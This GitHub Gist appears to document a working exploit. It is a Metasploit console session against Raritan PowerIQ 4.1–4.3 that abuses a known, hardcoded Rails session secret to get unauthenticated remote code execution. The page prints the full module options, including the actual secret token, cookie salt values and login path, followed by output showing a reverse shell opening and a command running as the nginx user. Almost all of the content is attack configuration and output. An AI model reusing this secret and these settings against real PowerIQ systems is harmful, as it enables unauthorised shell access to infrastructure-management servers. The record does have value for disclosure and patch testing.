Last active
August 29, 2015 14:16
-
-
Save brandonprry/f83917e0fcc3bf3ccd6b to your computer and use it in GitHub Desktop.
Raritan PowerIQ 4.1/4.2/4.3 known session secret unauthenticated RCE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msf exploit(rails_secret_deserialization) > show options | |
| Module options (exploit/multi/http/rails_secret_deserialization): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| COOKIE_NAME no The name of the session cookie | |
| DIGEST_NAME SHA1 yes The digest type used to HMAC the session cookie | |
| HTTP_METHOD GET yes The HTTP request method (GET, POST, PUT typically work) | |
| Proxies no A proxy chain of format type:host:port[,type:host:port][...] | |
| RAILSVERSION 3 yes The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4) | |
| RHOST 192.168.0.20 yes The target address | |
| RPORT 443 yes The target port | |
| SALTENC BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw== yes The encrypted cookie salt | |
| SALTSIG 42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8 yes The signed encrypted cookie salt | |
| SECRET 8e238c9702412d475a4c44b7726a0537 yes The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie) | |
| TARGETURI /login/login yes The path to a vulnerable Ruby on Rails application | |
| VALIDATE_COOKIE true no Only send the payload if the session cookie is validated | |
| VHOST no HTTP server virtual host | |
| Exploit target: | |
| Id Name | |
| -- ---- | |
| 0 Automatic | |
| msf exploit(rails_secret_deserialization) > exploit | |
| [*] Started reverse handler on 192.168.0.19:4444 | |
| [*] Checking for cookie | |
| [*] Adjusting cookie name to _session_id | |
| [+] SECRET matches! Sending exploit payload | |
| [*] Sending cookie _session_id | |
| [*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500 | |
| id | |
| uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment